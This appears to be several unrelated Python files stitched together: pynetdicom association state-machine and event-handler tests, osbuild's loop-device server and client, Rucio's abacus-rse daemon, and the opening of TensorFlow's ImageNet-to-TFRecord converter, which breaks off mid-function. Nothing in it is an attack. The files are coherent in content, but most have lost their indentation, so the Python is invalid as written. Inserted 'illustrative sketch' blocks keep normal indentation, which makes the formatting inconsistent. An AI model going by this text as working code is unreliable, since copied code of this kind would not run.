# In this case the association acceptor will hit AR_2
FINITE_STATE.ACTIONS['AR-2'] = ('Bluh', AR_2, 'Sta8')
self.scp = DummyVerificationSCP()
self.scp.start()
assert self.fsm.current_state == 'Sta1'
self.assoc.start()
while (not self.assoc.is_established and not self.assoc.is_rejected and
not self.assoc.is_aborted and not self.assoc.dul._kill_thread):
time.sleep(0.05)
self.assoc.release()
assert self.fsm._transitions == [
'Sta4', # Waiting for connection to complete
'Sta5', # Waiting for A-ASSOC-AC or -RJ PDU
'Sta6', # Assoc established
'Sta7',
'Sta7', # Waiting for A-RELEASE-RP PDU
'Sta1' # Idle
]
assert self.fsm._changes == [
('Sta1', 'Evt1', 'AE-1'), # A-ASSOC rq primitive
('Sta4', 'Evt2', 'AE-2'), # connection confirmed
('Sta5', 'Evt3', 'AE-3'), # A-ASSOC-AC PDU recv
('Sta6', 'Evt11', 'AR-1'), # A-RELEASE rq primitive
('Sta7', 'Evt10', 'AR-6'), # P-DATA-TF PDU recv
('Sta7', 'Evt13', 'AR-3'), # A-RELEASE-RP PDU recv
]
assert self.fsm.current_state == 'Sta1'
self.scp.stop()
FINITE_STATE.ACTIONS['AR-2'] = orig_entry
class TestStateMachineFunctionalAcceptor(object):
"""Functional tests for StateMachine as association acceptor."""
def setup(self):
"""Run prior to each test"""
self.scp = None
ae = AE()
ae.add_requested_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='requestor')
assoc.set_socket(AssociationSocket(assoc))
# Association Acceptor object -> remote AE
assoc.acceptor.ae_title = validate_ae_title(b'ANY_SCU')
assoc.acceptor.address = 'localhost'
assoc.acceptor.port = 11112
# Association Requestor object -> local AE
assoc.requestor.address = ''
assoc.requestor.port = 11113
assoc.requestor.ae_title = ae.ae_title
assoc.requestor.maximum_length = 16382
assoc.requestor.implementation_class_uid = (
ae.implementation_class_uid
)
assoc.requestor.implementation_version_name = (
ae.implementation_version_name
)
cx = build_context(VerificationSOPClass)
cx.context_id = 1
assoc.requestor.requested_contexts = [cx]
self.assoc = assoc
self.fsm = self.monkey_patch(assoc.dul.state_machine)
def teardown(self):
"""Clear any active threads"""
if self.scp:
self.scp.abort()
time.sleep(0.1)
for thread in threading.enumerate():
if isinstance(thread, DummyBaseSCP):
thread.abort()
thread.stop()
def monkey_patch(self, fsm):
"""Monkey patch the StateMachine to add testing hooks."""
# Record all state transitions
fsm._transitions = []
fsm.original_transition = fsm.transition
def transition(state):
fsm._transitions.append(state)
fsm.original_transition(state)
fsm.transition = transition
# Record all event/state/actions
fsm._changes = []
fsm.original_action = fsm.do_action
def do_action(event):
if (event, fsm.current_state) in TRANSITION_TABLE:
action_name = TRANSITION_TABLE[(event, fsm.current_state)]
fsm._changes.append((fsm.current_state, event, action_name))
fsm.original_action(event)
fsm.do_action = do_action
return fsm
def test_invalid_protocol_version(self):
"""Test receiving an A-ASSOC-RQ with invalid protocol version."""
self.scp = DummyVerificationSCP()
self.scp.start()
assert self.fsm.current_state == 'Sta1'
# Patch AE_2
orig_entry = FINITE_STATE.ACTIONS['AE-2']
def AE_2(dul):
dul.pdu = A_ASSOCIATE_RQ()
dul.pdu.from_primitive(dul.primitive)
dul.pdu.protocol_version = 0x0002
bytestream = dul.pdu.encode()
dul.socket.send(bytestream)
return 'Sta5'
FINITE_STATE.ACTIONS['AE-2'] = ('Bluh', AE_2, 'Sta5')
self.assoc.start()
while (not self.assoc.is_established and not self.assoc.is_rejected and
not self.assoc.is_aborted and not self.assoc.dul._kill_thread):
time.sleep(0.05)
assert self.assoc.is_rejected
assert self.assoc.acceptor.primitive.result == 0x01
assert self.assoc.acceptor.primitive.result_source == 0x02
assert self.assoc.acceptor.primitive.diagnostic == 0x02
assert self.fsm.current_state == 'Sta1'
self.scp.stop()
FINITE_STATE.ACTIONS['AE-2'] = orig_entry
class TestEventHandling(object):
"""Test the FSM event handlers."""
def setup(self):
self.ae = None
def teardown(self):
if self.ae:
self.ae.shutdown()
def test_no_handlers(self):
"""Test with no handlers bound."""
self.ae = ae = AE()
ae.add_supported_context('1.2.840.10008.1.1')
ae.add_requested_context('1.2.840.10008.1.1')
scp = ae.start_server(('', 11112), block=False)
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == []
assoc = ae.associate('localhost', 11112)
assert assoc.is_established
assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == []
assoc.release()
scp.shutdown()
def test_transition_acceptor(self):
"""Test EVT_FSM_TRANSITION as acceptor."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context('1.2.840.10008.1.1')
ae.add_requested_context('1.2.840.10008.1.1')
handlers = [(evt.EVT_FSM_TRANSITION, handle)]
scp = ae.start_server(('', 11112), block=False, evt_handlers=handlers)
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == [handle]
assoc = ae.associate('localhost', 11112)
assert assoc.is_established
assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == [handle]
assoc.release()
while scp.active_associations:
time.sleep(0.05)
for event in triggered:
assert hasattr(event, 'current_state')
assert hasattr(event, 'fsm_event')
assert hasattr(event, 'action')
assert hasattr(event, 'next_state')
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime.datetime)
assert event.event.name == 'EVT_FSM_TRANSITION'
assert event.event.description == "State machine about to transition"
states = [ee.current_state for ee in triggered]
assert states[:6] == ['Sta1', 'Sta2', 'Sta3', 'Sta6', 'Sta8', 'Sta13']
scp.shutdown()
def test_transition_acceptor_bind(self):
"""Test EVT_FSM_TRANSITION as acceptor."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context('1.2.840.10008.1.1')
ae.add_requested_context('1.2.840.10008.1.1')
scp = ae.start_server(('', 11112), block=False)
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == []
assoc = ae.associate('localhost', 11112)
assert assoc.is_established
assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == []
scp.bind(evt.EVT_FSM_TRANSITION, handle)
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == [handle]
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == [handle]
assoc.release()
while scp.active_associations:
time.sleep(0.05)
for event in triggered:
assert hasattr(event, 'current_state')
assert hasattr(event, 'fsm_event')
assert hasattr(event, 'action')
assert hasattr(event, 'next_state')
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime.datetime)
states = [ee.current_state for ee in triggered]
assert states[:3] == ['Sta6', 'Sta8', 'Sta13']
def test_transition_acceptor_unbind(self):
"""Test EVT_FSM_TRANSITION as acceptor."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context('1.2.840.10008.1.1')
ae.add_requested_context('1.2.840.10008.1.1')
handlers = [(evt.EVT_FSM_TRANSITION, handle)]
scp = ae.start_server(('', 11112), block=False, evt_handlers=handlers)
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == [handle]
assoc = ae.associate('localhost', 11112)
assert assoc.is_established
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == [handle]
scp.unbind(evt.EVT_FSM_TRANSITION, handle)
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == []
assoc.release()
while scp.active_associations:
time.sleep(0.05)
for event in triggered:
assert hasattr(event, 'current_state')
assert hasattr(event, 'fsm_event')
assert hasattr(event, 'action')
assert hasattr(event, 'next_state')
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime.datetime)
states = [ee.current_state for ee in triggered]
assert states[:3] == ['Sta1', 'Sta2', 'Sta3']
scp.shutdown()
def test_transition_requestor(self):
"""Test EVT_FSM_TRANSITION as requestor."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context('1.2.840.10008.1.1')
ae.add_requested_context('1.2.840.10008.1.1')
handlers = [(evt.EVT_FSM_TRANSITION, handle)]
scp = ae.start_server(('', 11112), block=False)
assoc = ae.associate('localhost', 11112, evt_handlers=handlers)
assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == [handle]
assert assoc.is_established
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == []
assoc.release()
while not assoc.is_released:
time.sleep(0.05)
for event in triggered:
assert hasattr(event, 'current_state')
assert hasattr(event, 'fsm_event')
assert hasattr(event, 'action')
assert hasattr(event, 'next_state')
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime.datetime)
states = [ee.current_state for ee in triggered]
assert states[:5] == ['Sta1', 'Sta4', 'Sta5', 'Sta6', 'Sta7']
scp.shutdown()
def test_transition_requestor_bind(self):
"""Test EVT_FSM_TRANSITION as requestor."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context('1.2.840.10008.1.1')
ae.add_requested_context('1.2.840.10008.1.1')
scp = ae.start_server(('', 11112), block=False)
assoc = ae.associate('localhost', 11112)
assert assoc.is_established
assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == []
assoc.bind(evt.EVT_FSM_TRANSITION, handle)
assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == [handle]
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == []
assoc.release()
while not assoc.is_released:
time.sleep(0.05)
for event in triggered:
assert hasattr(event, 'current_state')
assert hasattr(event, 'fsm_event')
assert hasattr(event, 'action')
assert hasattr(event, 'next_state')
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime.datetime)
states = [ee.current_state for ee in triggered]
assert states[:2] == ['Sta6', 'Sta7']
scp.shutdown()
def test_transition_requestor_unbind(self):
"""Test EVT_FSM_TRANSITION as requestor."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context('1.2.840.10008.1.1')
ae.add_requested_context('1.2.840.10008.1.1')
handlers = [(evt.EVT_FSM_TRANSITION, handle)]
scp = ae.start_server(('', 11112), block=False)
assoc = ae.associate('localhost', 11112, evt_handlers=handlers)
assert assoc.is_established
assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == [handle]
assoc.unbind(evt.EVT_FSM_TRANSITION, handle)
assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == []
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == []
assoc.release()
while not assoc.is_released:
time.sleep(0.05)
for event in triggered:
assert hasattr(event, 'current_state')
assert hasattr(event, 'fsm_event')
assert hasattr(event, 'action')
assert hasattr(event, 'next_state')
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime.datetime)
states = [ee.current_state for ee in triggered]
assert states[:3] == ['Sta1', 'Sta4', 'Sta5']
scp.shutdown()
def test_transition_raises(self, caplog):
"""Test the handler for EVT_FSM_TRANSITION raising exception."""
def handle(event):
raise NotImplementedError("Exception description")
self.ae = ae = AE()
ae.add_supported_context(VerificationSOPClass)
ae.add_requested_context(VerificationSOPClass)
handlers = [(evt.EVT_FSM_TRANSITION, handle)]
scp = ae.start_server(('', 11112), block=False, evt_handlers=handlers)
with caplog.at_level(logging.ERROR, logger='pynetdicom'):
assoc = ae.associate('localhost', 11112)
assert assoc.is_established
assoc.release()
while scp.active_associations:
time.sleep(0.05)
scp.shutdown()
msg = (
"Exception raised in user's 'evt.EVT_FSM_TRANSITION' event "
"handler 'handle'"
)
assert msg in caplog.text
assert "Exception description" in caplog.text
|
remoteloop.py
|
import array
import asyncio
import errno
import json
import os
import socket
import threading
import osbuild.loop as loop
__all__ = [
"LoopClient",
"LoopServer"
]
def load_fds(sock, msglen):
fds = array.array("i") # Array of ints
msg, ancdata, _, addr = sock.recvmsg(msglen, socket.CMSG_LEN(253 * fds.itemsize))
for cmsg_level, cmsg_type, cmsg_data in ancdata:
if (cmsg_level == socket.SOL_SOCKET and cmsg_type == socket.SCM_RIGHTS):
# Append data, ignoring any truncated integers at the end.
fds.frombytes(cmsg_data[:len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
return json.loads(msg), list(fds), addr
def dump_fds(sock, obj, fds):
sock.sendmsg([json.dumps(obj).encode('utf-8')], [(socket.SOL_SOCKET, socket.SCM_RIGHTS, array.array("i", fds))])
class LoopServer:
"""Server for creating loopback devices
The server listens for requests on an AF_UNIX/SOCK_DGRAM socket.
A request should contain SCM_RIGHTS of two file descriptors, one
that should be the backing file for the new loop device, and a
second that should be a directory file descriptor where the new
device node will be created.
The payload should be a JSON object with the mandatory arguments
@fd which is the offset in the SCM_RIGHTS array for the backing
file descriptor and @dir_fd which is the offset for the output
directory. Optionally, @offset and @sizelimit in bytes may also
be specified.
The server responds with a JSON object containing the device name
of the new device node created in the output directory.
The created loopback device is guaranteed to be bound to the
given backing file descriptor for the lifetime of the LoopServer
object.
"""
def __init__(self, sock):
self.devs = []
self.sock = sock
self.ctl = loop.LoopControl()
self.event_loop = asyncio.new_event_loop()
self.event_loop.add_reader(self.sock, self._dispatch)
self.thread = threading.Thread(target=self._run_event_loop)
def __del__(self):
self.sock.close()
def _create_device(self, fd, dir_fd, offset=None, sizelimit=None):
while True:
# Getting an unbound loopback device and attaching a backing
# file descriptor to it is racy, so we must use a retry loop
lo = loop.Loop(self.ctl.get_unbound())
try:
lo.set_fd(fd)
except OSError as e:
if e.errno == errno.EBUSY:
continue
raise e
break
lo.set_status(offset=offset, sizelimit=sizelimit, autoclear=True)
lo.mknod(dir_fd)
# Pin the Loop objects so they are only released when the LoopServer
# is destroyed.
self.devs.append(lo)
return lo.devname
def _dispatch(self):
args, fds, addr = load_fds(self.sock, 1024)
fd = fds[args["fd"]]
dir_fd = fds[args["dir_fd"]]
offset = args.get("offset")
sizelimit = args.get("sizelimit")
devname = self._create_device(fd, dir_fd, offset, sizelimit)
ret = json.dumps({"devname": devname})
self.sock.sendto(ret.encode('utf-8'), addr)
def _run_event_loop(self):
# Set the thread-local event loop
asyncio.set_event_loop(self.event_loop)
# Run event loop until stopped
self.event_loop.run_forever()
def __enter__(self):
self.thread.start()
def __exit__(self, *args):
self.event_loop.call_soon_threadsafe(self.event_loop.stop)
self.thread.join()
class LoopClient:
def __init__(self, sock):
self.sock = sock
def __del__(self):
self.sock.close()
def create_device(self, fd, dir_fd=None, offset=None, sizelimit=None):
req = {}
fds = array.array("i")
if not dir_fd:
dir_fd = os.open("/dev", os.O_DIRECTORY)
fds.append(fd)
req["fd"] = 0
fds.append(dir_fd)
req["dir_fd"] = 1
if offset:
req["offset"] = offset
if sizelimit:
req["sizelimit"] = sizelimit
dump_fds(self.sock, req, fds)
ret = json.loads(self.sock.recv(1024))
return ret["devname"]
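# Illustrative usage sketch (not part of the original module). Assumes the caller
# has the privileges needed to create loop devices and that "disk.img" is a
# hypothetical backing file; the socketpair wiring below is only one possible setup.
def _example_usage(image_path="disk.img"):
    server_sock, client_sock = socket.socketpair(socket.AF_UNIX, socket.SOCK_DGRAM)
    client = LoopClient(client_sock)
    fd = os.open(image_path, os.O_RDWR)
    try:
        # LoopServer runs its event loop in a background thread while the
        # context manager is active.
        with LoopServer(server_sock):
            devname = client.create_device(fd, sizelimit=1024 * 1024)
            print("created loop device:", devname)
    finally:
        os.close(fd)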
|
rse.py
|
# Copyright 2014-2018 CERN for the benefit of the ATLAS collaboration.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Martin Barisits <martin.barisits@cern.ch>, 2014-2016
# - Vincent Garonne <vgaronne@gmail.com>, 2018
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019
# - Brandon White <bjwhite@fnal.gov>, 2019-2020
# - Thomas Beermann <thomas.beermann@cern.ch>, 2020
#
# PY3K COMPATIBLE
"""
Abacus-RSE is a daemon to update RSE counters.
"""
import logging
import os
import socket
import sys
import threading
import time
import traceback
from rucio.common.config import config_get
from rucio.common.utils import get_thread_with_periodic_running_function
from rucio.core.heartbeat import live, die, sanity_check
from rucio.core.rse_counter import get_updated_rse_counters, update_rse_counter, fill_rse_counter_history_table
graceful_stop = threading.Event()
logging.basicConfig(stream=sys.stdout,
level=getattr(logging,
config_get('common', 'loglevel',
raise_exception=False,
default='DEBUG').upper()),
format='%(asctime)s\t%(process)d\t%(levelname)s\t%(message)s')
def rse_update(once=False):
"""
Main loop to check and update the RSE Counters.
"""
logging.info('rse_update: starting')
logging.info('rse_update: started')
# Make an initial heartbeat so that all abacus-rse daemons have the correct worker number on the next try
executable = 'abacus-rse'
hostname = socket.gethostname()
pid = os.getpid()
current_thread = threading.current_thread()
live(executable=executable, hostname=hostname, pid=pid, thread=current_thread)
while not graceful_stop.is_set():
try:
# Heartbeat
heartbeat = live(executable=executable, hostname=hostname, pid=pid, thread=current_thread)
# Select a bunch of RSEs to update for this worker
start = time.time() # NOQA
rse_ids = get_updated_rse_counters(total_workers=heartbeat['nr_threads'],
worker_number=heartbeat['assign_thread'])
logging.debug('Index query time %f size=%d' % (time.time() - start, len(rse_ids)))
# If the list is empty, send the worker to sleep
if not rse_ids and not once:
logging.info('rse_update[%s/%s] did not get any work' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1))
time.sleep(10)
else:
for rse_id in rse_ids:
if graceful_stop.is_set():
break
start_time = time.time()
update_rse_counter(rse_id=rse_id)
logging.debug('rse_update[%s/%s]: update of rse "%s" took %f' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1, rse_id, time.time() - start_time))
except Exception:
logging.error(traceback.format_exc())
if once:
break
logging.info('rse_update: graceful stop requested')
die(executable=executable, hostname=hostname, pid=pid, thread=current_thread)
logging.info('rse_update: graceful stop done')
def stop(signum=None, frame=None):
"""
Graceful exit.
"""
graceful_stop.set()
def run(once=False, threads=1, fill_history_table=False):
"""
Starts up the Abacus-RSE threads.
"""
executable = 'abacus-rse'
hostname = socket.gethostname()
sanity_check(executable=executable, hostname=hostname)
if once:
logging.info('main: executing one iteration only')
rse_update(once)
else:
logging.info('main: starting threads')
threads = [threading.Thread(target=rse_update, kwargs={'once': once}) for i in range(0, threads)]
if fill_history_table:
threads.append(get_thread_with_periodic_running_function(3600, fill_rse_counter_history_table, graceful_stop))
[t.start() for t in threads]
logging.info('main: waiting for interrupts')
# Interruptible joins require a timeout.
while threads[0].is_alive():
[t.join(timeout=3.14) for t in threads]
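# Illustrative launcher sketch (not part of this module): the actual entry point
# typically lives in a separate launcher script, but a minimal wrapper would wire
# the signal handler to stop() and then call run(), e.g.:
if __name__ == '__main__':
    import signal
    # stop(signum, frame) matches the signal handler signature
    signal.signal(signal.SIGTERM, stop)
    signal.signal(signal.SIGINT, stop)
    run(once=False, threads=1)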
|
build_imagenet_data.py
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts ImageNet data to TFRecords file format with Example protos.
The raw ImageNet data set is expected to reside in JPEG files located in the
following directory structure.
data_dir/n01440764/ILSVRC2012_val_00000293.JPEG
data_dir/n01440764/ILSVRC2012_val_00000543.JPEG
...
where 'n01440764' is the unique synset label associated with
these images.
The training data set consists of 1000 sub-directories (i.e. labels)
each containing 1200 JPEG images for a total of 1.2M JPEG images.
The evaluation data set consists of 1000 sub-directories (i.e. labels)
each containing 50 JPEG images for a total of 50K JPEG images.
This TensorFlow script converts the training and evaluation data into
a sharded data set consisting of 1024 and 128 TFRecord files, respectively.
train_directory/train-00000-of-01024
train_directory/train-00001-of-01024
...
train_directory/train-00127-of-01024
and
validation_directory/validation-00000-of-00128
validation_directory/validation-00001-of-00128
...
validation_directory/validation-00127-of-00128
Each validation TFRecord file contains ~390 records. Each training TFRecord
file contains ~1250 records. Each record within the TFRecord file is a
serialized Example proto. The Example proto contains the following fields:
image/encoded: string containing JPEG encoded image in RGB colorspace
image/height: integer, image height in pixels
image/width: integer, image width in pixels
image/colorspace: string, specifying the colorspace, always 'RGB'
image/channels: integer, specifying the number of channels, always 3
image/format: string, specifying the format, always 'JPEG'
image/filename: string containing the basename of the image file
e.g. 'n01440764_10026.JPEG' or 'ILSVRC2012_val_00000293.JPEG'
image/class/label: integer specifying the index in a classification layer.
The label ranges from [1, 1000] where 0 is not used.
image/class/synset: string specifying the unique ID of the label,
e.g. 'n01440764'
image/class/text: string specifying the human-readable version of the label
e.g. 'red fox, Vulpes vulpes'
image/object/bbox/xmin: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/xmax: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/ymin: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/ymax: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/label: integer specifying the index in a classification
layer. The label ranges from [1, 1000] where 0 is not used. Note this is
always identical to the image label.
Note that the length of xmin is identical to the length of xmax, ymin and ymax
for each example.
Running this script using 16 threads may take around 2.5 hours on an HP Z420.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os
import random
import sys
import threading
import numpy as np
import tensorflow as tf
tf.app.flags.DEFINE_string('train_directory', '/tmp/',
'Training data directory')
tf.app.flags.DEFINE_string('validation_directory', '/tmp/',
'Validation data directory')
tf.app.flags.DEFINE_string('output_directory', '/tmp/',
'Output data directory')
tf.app.flags.DEFINE_integer('train_shards', 1024,
'Number of shards in training TFRecord files.')
tf.app.flags.DEFINE_integer('validation_shards', 128,
'Number of shards in validation TFRecord files.')
tf.app.flags.DEFINE_integer('num_threads', 8,
'Number of threads to preprocess the images.')
# The labels file contains the list of valid labels, one per line.
# Assumes that the file contains entries as such:
# n01440764
# n01443537
# n01484850
# where each line corresponds to a label expressed as a synset. We map
# each synset contained in the file to an integer (based on the alphabetical
# ordering). See below for details.
tf.app.flags.DEFINE_string('labels_file',
'imagenet_lsvrc_2015_synsets.txt',
'Labels file')
# This file containing mapping from synset to human-readable label.
# Assumes each line of the file looks like:
#
# n02119247 black fox
# n02119359 silver fox
# n02119477 red fox, Vulpes fulva
#
# where each line corresponds to a unique mapping. Note that each line is
# formatted as <synset>\t<human readable label>.
tf.app.flags.DEFINE_string('imagenet_metadata_file',
'imagenet_metadata.txt',
'ImageNet metadata file')
# This file is the output of process_bounding_box.py
# Assumes each line of the file looks like:
#
# n00007846_64193.JPEG,0.0060,0.2620,0.7545,0.9940
#
# where each line corresponds to one bounding box annotation associated
# with an image. Each line can be parsed as:
#
# <JPEG file name>, <xmin>, <ymin>, <xmax>, <ymax>
#
# Note that there might exist multiple bounding box annotations associated
# with an image file.
tf.app.flags.DEFINE_string('bounding_box_file',
'./imagenet_2012_bounding_boxes.csv',
'Bounding box file')
FLAGS = tf.app.flags.FLAGS
def _int64_feature(value):
"""Wrapper for inserting int64 features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def _float_feature(value):
"""Wrapper for inserting float features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(float_list=tf.train.FloatList(value=value))
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _convert_to_example(filename, image_buffer, label, synset, human, bbox,
height, width):
"""Build an Example proto for an example.
Args:
filename: string, path to an image file, e.g., '/path/to/example.JPG'
image_buffer: string, JPEG encoding of RGB image
label: integer, identifier for the ground truth for the network
synset: string, unique WordNet ID specifying the label, e.g., 'n02323233'
human: string, human-readable label, e.g., 'red fox, Vulpes vulpes'
bbox: list of bounding boxes; each box is a list of integers
specifying [xmin, ymin, xmax, ymax]. All boxes are assumed to belong to
the same label as the image label.
height: integer, image height in pixels
width: integer, image width in pixels
Returns:
Example proto
"""
xmin = []
ymin = []
xmax = []
ymax = []
for b in bbox:
assert len(b) == 4
# pylint: disable=expression-not-assigned
[l.append(point) for l, point in zip([xmin, ymin, xmax, ymax], b)]
# pylint: enable=expression-not-assigned
colorspace = 'RGB'
channels = 3
image_format = 'JPEG'
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': _int64_feature(height),
'image/width': _int64_feature(width),
'image/colorspace': _bytes_feature(colorspace),
'image/channels': _int64_feature(channels),
'image/class/label': _int64_feature(label),
'image/class/synset': _bytes_feature(synset),
'image/class/text': _bytes_feature(human),
'image/object/bbox/xmin': _float_feature(xmin),
'image/object/bbox/xmax': _float_feature(xmax),
'image/object/bbox/ymin': _float_feature(ymin),
'image/object/bbox/ymax': _float_feature(ymax),
'image/object/bbox/label': _int64_feature([label] * len(xmin)),
'image/format': _bytes_feature(image_format),
'image/filename': _bytes_feature(os.path.basename(filename)),
'image/encoded': _bytes_feature(image_buffer)}))
return example
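# Illustrative sketch only (not called anywhere in this script): how a record
# written by _convert_to_example could be parsed back. The feature keys mirror
# the fields documented in the module docstring; the helper name and the
# subset of keys shown here are assumptions for illustration.
def _parse_example_sketch(serialized_example):
  """Parses a serialized Example written by this script (illustrative only)."""
  feature_map = {
      'image/encoded': tf.FixedLenFeature([], dtype=tf.string),
      'image/class/label': tf.FixedLenFeature([], dtype=tf.int64),
      'image/class/synset': tf.FixedLenFeature([], dtype=tf.string),
      'image/height': tf.FixedLenFeature([], dtype=tf.int64),
      'image/width': tf.FixedLenFeature([], dtype=tf.int64),
      # The bounding-box coordinates are variable-length float lists.
      'image/object/bbox/xmin': tf.VarLenFeature(dtype=tf.float32),
      'image/object/bbox/xmax': tf.VarLenFeature(dtype=tf.float32),
      'image/object/bbox/ymin': tf.VarLenFeature(dtype=tf.float32),
      'image/object/bbox/ymax': tf.VarLenFeature(dtype=tf.float32),
  }
  return tf.parse_single_example(serialized_example, feature_map)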
class ImageCoder(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self):
# Create a single Session to run all image coding calls.
self._sess = tf.Session()
# Initializes function that converts PNG to JPEG data.
self._png_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_png(self._png_data, channels=3)
self._png_to_jpeg = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that converts CMYK JPEG data to RGB JPEG data.
self._cmyk_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_jpeg(self._cmyk_data, channels=0)
self._cmyk_to_rgb = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that decodes RGB JPEG data.
self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)
def png_to_jpeg(self, image_data):
return self._sess.run(self._png_to_jpeg,
feed_dict={self._png_data: image_data})
def cmyk_to_rgb(self, image_data):
return self._sess.run(self._cmyk_to_rgb,
feed_dict={self._cmyk_data: image_data})
def decode_jpeg(self, image_data):
image = self._sess.run(self._decode_jpeg,
feed_dict={self._decode_jpeg_data: image_data})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
def _is_png(filename):
"""Determine if a file contains a PNG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a PNG.
"""
# File list from:
# https://groups.google.com/forum/embed/?place=forum/torch7#!topic/torch7/fOSTXHIESSU
return 'n02105855_2933.JPEG' in filename
def _is_cmyk(filename):
"""Determine if file contains a CMYK JPEG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a JPEG encoded with CMYK color space.
"""
# File list from:
# https://github.com/cytsai/ilsvrc-cmyk-image-list
blacklist = ['n01739381_1309.JPEG', 'n02077923_14822.JPEG',
'n02447366_23489.JPEG', 'n02492035_15739.JPEG',
'n02747177_10752.JPEG', 'n03018349_4028.JPEG',
'n03062245_4620.JPEG', 'n03347037_9675.JPEG',
'n03467068_12171.JPEG', 'n03529860_11437.JPEG',
'n03544143_17228.JPEG', 'n03633091_5218.JPEG',
'n03710637_5125.JPEG', 'n03961711_5286.JPEG',
'n04033995_2932.JPEG', 'n04258138_17003.JPEG',
'n04264628_27969.JPEG', 'n04336792_7448.JPEG',
'n04371774_5854.JPEG', 'n04596742_4225.JPEG',
'n07583066_647.JPEG', 'n13037406_4650.JPEG']
return filename.split('/')[-1] in blacklist
def _process_image(filename, coder):
"""Process a single image file.
Args:
filename: string, path to an image file e.g., '/path/to/example.JPG'.
coder: instance of ImageCoder to provide TensorFlow image coding utils.
Returns:
image_buffer: string, JPEG encoding of RGB image.
height: integer, image height in pixels.
width: integer, image width in pixels.
"""
# Read the image file.
with open(filename, 'rb') as f:
image_data = f.read()
# Clean the dirty data.
if _is_png(filename):
# 1 image is a PNG.
print('Converting PNG to JPEG for %s' % filename)
image_data = coder.png_to_jpeg(image_data)
elif _is_cmyk(filename):
